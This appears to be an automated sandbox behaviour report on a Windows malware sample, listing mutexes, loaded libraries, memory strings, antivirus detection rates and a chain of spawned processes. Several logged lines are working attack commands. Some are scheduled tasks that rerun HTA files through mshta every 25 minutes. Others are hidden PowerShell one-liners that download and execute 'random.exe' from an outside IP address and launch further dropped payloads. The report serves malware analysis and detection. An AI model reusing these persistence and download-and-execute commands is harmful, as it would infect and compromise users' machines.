Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\5c9465cda4.exe

File created: C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta

Jump to behavior

Source: 5c9465cda4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\5c9465cda4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, chromium.exe	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: 5c9465cda4.exe	Virustotal: Detection: 69%
Source: 5c9465cda4.exe	ReversingLabs: Detection: 57%

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: " /add /y
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: " /add
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: " /add /y
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: " /add
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\5c9465cda4.exe "C:\Users\user\Desktop\5c9465cda4.exe"
Source: C:\Users\user\Desktop\5c9465cda4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\5c9465cda4.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe "C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe"
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe "C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe "C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe "C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe"
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\SyboFREGa.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "s9rWGma3f0H" /tr "mshta \"C:\Temp\4LrdSfC7c.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\4LrdSfC7c.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\4LrdSfC7c.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe "C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\Desktop\5c9465cda4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe "C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe "C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe "C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe "C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe "C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "s9rWGma3f0H" /tr "mshta \"C:\Temp\4LrdSfC7c.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\4LrdSfC7c.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
